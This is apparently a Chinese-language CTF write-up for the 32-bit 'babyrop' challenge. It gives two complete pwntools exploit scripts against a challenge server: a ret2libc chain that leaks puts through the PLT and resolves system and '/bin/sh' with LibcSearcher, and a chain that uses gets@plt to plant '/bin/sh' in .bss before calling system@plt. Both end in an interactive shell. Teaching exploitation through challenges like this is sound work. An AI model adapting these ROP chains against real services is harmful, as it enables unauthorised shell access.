有两个思路。第一个是打 ret2libc：先用 puts@plt 泄露 puts 在 libc 中的地址，算出 libc 基址后再返回到 system("/bin/sh")。
# -*- coding:utf-8 -*-
from pwn import *
from LibcSearcher import *
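context(log_level='debug', arch='i386', os='linux')
pwnfile = './babyrop'
# `python exp.py LOCAL` targets a local process instead of the remote service
# (pwntools' `args` magic); the default stays the remote target.
io = process(pwnfile) if args.LOCAL else remote('1.14.71.254', 28745)
elf = ELF(pwnfile)

# Distance from the start of the overflowed buffer to the saved return
# address: 0x28 bytes of buffer plus 4 bytes of saved ebp on i386.
padding = 0x28 + 0x04
puts_got = elf.got['puts']
# NOTE(review): the original author warns that if the resolved PLT and GOT
# addresses coincide, the binary probably uses endbr32 / IBT PLT stubs and
# the real stub address should be verified in IDA before trusting it.
puts_plt = elf.plt['puts']
# Returning to main after the leak gives us a second overflow once libc is known.
return_addr = elf.sym['main']
log.info("puts_got:    " + hex(puts_got))
log.info("puts_plt:    " + hex(puts_plt))
log.info("return_addr: " + hex(return_addr))

# Stage 1: ret2plt leak -- puts(puts_got), then return to main.
payload = flat([b'a' * padding, puts_plt, return_addr, puts_got])
delimiter = b'Can you give me some advise?\n'
io.sendlineafter(delimiter, payload)
# puts() writes the 4 raw bytes of puts@libc followed by '\n'. Cutting at the
# first 0xf7 byte relies on the 32-bit libc being mapped at 0xf7xxxxxx, which
# is the usual i386 mmap region but not guaranteed -- adjust if the leak is off.
leak = io.recvuntil(b'\xf7', timeout=5)
if len(leak) < 4:
    # log.error raises and aborts the script; a wrong padding or a missing
    # leak would otherwise be turned into a garbage libc base below.
    log.error('no libc pointer found in output (got %r); check padding/offsets' % leak)
puts_addr = u32(leak[-4:])

libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
# A libc base is always page aligned; anything else means LibcSearcher matched
# the wrong candidate libc or the leaked value is not puts@libc.
if libc_base & 0xfff:
    log.error('libc_base %#x is not page aligned; wrong libc candidate?' % libc_base)
system_addr = libc_base + libc.dump('system')
bin_addr = libc_base + libc.dump('str_bin_sh')
log.success('puts_addr:   ' + hex(puts_addr))
log.success('libc_base:   ' + hex(libc_base))
log.success('system_addr: ' + hex(system_addr))
log.success('bin_addr:    ' + hex(bin_addr))

# Stage 2: ret2libc -- system("/bin/sh"); return_addr only fills the
# fake return-address slot that system() expects above its argument.
payload2 = flat([b'a' * padding, system_addr, return_addr, bin_addr])
io.sendlineafter(delimiter, payload2)
io.interactive()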
另外一个思路不需要泄露 libc：先返回到 gets@plt，把 "/bin/sh" 读到 .bss 的一个可写地址，然后再返回到 system@plt 去执行它。
from pwn import *
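context(log_level='debug', arch='i386', os='linux')
pwnfile = './babyrop'
# `python exp.py LOCAL` targets a local process instead of the remote service.
io = process(pwnfile) if args.LOCAL else remote('1.14.71.254', 28745)
elf = ELF(pwnfile)

# Writable scratch address in .bss where gets() will store "/bin/sh".
# Hard-coded from the binary -- it must be writable and must not overlap
# libc's stdin/stdout FILE* slots in .bss, or the program's I/O breaks.
# TODO(review): confirm against the binary's section headers.
bss_addr = 0x0804A028
# For imported functions elf.sym resolves to the PLT stub, which is what we
# want to return into.
sys_plt = elf.sym['system']
gets_plt = elf.sym['gets']
# Distance from the overflowed buffer to the saved return address
# (0x28 bytes of buffer + 4 bytes of saved ebp).
padding = 0x28 + 0x04

io.recvuntil(b'advise?')
# Chain: gets(bss_addr) -> system(bss_addr).
# At gets' entry the stack is [sys_plt][bss_addr][bss_addr]: sys_plt is gets'
# return address and the first bss_addr its argument. When gets returns into
# system, that same first bss_addr becomes system's (dummy) return address
# and the second bss_addr is system's argument.
payload = flat([b'a' * padding, gets_plt, sys_plt, bss_addr, bss_addr])
io.sendline(payload)
# This line feeds the gets() call; it is what system() will execute.
io.sendline(b'/bin/sh')
io.interactive()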
